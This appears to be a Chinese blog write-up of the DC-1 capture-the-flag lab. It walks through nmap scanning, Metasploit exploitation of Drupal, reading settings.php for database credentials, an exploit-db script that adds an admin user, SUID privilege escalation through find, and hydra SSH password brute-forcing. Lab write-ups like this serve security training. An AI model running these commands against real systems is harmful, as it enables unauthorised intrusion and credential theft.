内网渗透DC-1靶场通关(CTF)
2024-09-07 11:45:58
最新博客见我的个人博客地址
DC系列共9个靶场,本次来试玩一下DC-1,共有5个flag,下载地址。
下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。
首先在kali中扫一下目标ip
arp-scan -l
通过排除,发现目标ip为:192.168.0.119
经典套路,nmap扫一把
nmap -sS -sV 192.168.0.119
发现目标开启80和22端口
我们先看一下他的网页长啥样
是一个典型的drupal的CMS
立刻想到直接msf中search一下他的漏洞
msfconsole
search drupal
使用18年的那个试一下
shell进入命令行,python修饰一下shell,whoami发现自己已经进来了,是www-data用户
python -c 'import pty.pty.spawn("/bin/bash")'
成功发现当前目录的flag1.txt,提示我们要去查看drupal这个CMS的配置文件
上网搜索找到drupal的目录结构
cat /var/www/sites/default/settings.php
我们得到了flag2和数据库信息,当然可以考虑连接上数据库然后添加一个用户登录进网页的后台。我们这里采用另外一种方式。
searchsploit drupal
使用如下漏洞创建一个管理员账户
python /usr/share/exploitdb/exploits/php/webapps/34992.py -t http://192.168.0.119 -u haha123 -p haha123
登录后台发现flag3
flag3中提示我们可以使用SUID进行提权,SUID提权知识看这里
查看passwd和shadow,发现有flag4用户,但shadow没有权限查看
在www-data用户下查看什么命令能以root执行
find / -perm -4000 2>/dev/null
发现find
cd /tmp
touch 666
find / -name 666 -exec "/bin/sh" \;
whoami
发现自己已经是root了,提权成功。
然后再/home/flag4中找到flag4和/root中找到finalflag
或者我们还可以使用hydra尝试对flag4用户密码进行爆破
hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz 192.168.0.119 ssh
爆破出密码为orange
用ssh进行连接,成功登陆。
接下来依旧利用SUID进行提权。
最新文章
- POJ1947 Rebuilding Roads[树形背包]
- python 基本语法
- RabbitMQ入门教程——路由(Routing)
- Struts2类型转换器
- Android中的Adapter 详解
- 指定端口号,多线程扫描局域网内IP地址
- 使用DiskGenius对虚拟机磁盘进行压缩
- 在drawRect:方法中绘制图片,文字以及Core Graphics 框架的了解
- 微软微服务eShopOnContainers示例之EventBusRabbitMq解析与实践
- python3 字符串/列表/元组(str/list/tuple)相互转换方法及join()函数的使用
- spring boot项目能启动打包失败
- asp.net core 2.0发布到IIS流程及报错解决方案
- Linux Free命令每个数字的含义 和 cache 、buffer的区别
- POJ 3662	Telephone Lines (二分 + 最短路)
- springcloud之eureka配置——eureka.instance
- SpringBoot配置发送邮件
- goconfig - INI 解析器
- leetcode笔记:Bulls and Cows
- ios中LeveyPopListView 弹出view的用法
- bootstrap重置校验方法
热门文章
- 程序挂了之后别再跟我说让我帮你重启啦! 让supervisor帮你搞定...
- Clean Architecture For RazorPage 实现多语言和本地化
- 前后端数据交互(六)——ajax 、fetch 和 axios 优缺点及比较
- noip模拟45
- [CVE-2020-1956] Apache Kylin远程命令执行漏洞复现
- 法术迸发(Spellburst)
- WPF 通过进程实现异常隔离的客户端
- Hadoop 2.x安装
- 机器学习——支持向量机SVM
- 3.8学习总结——Android保存信息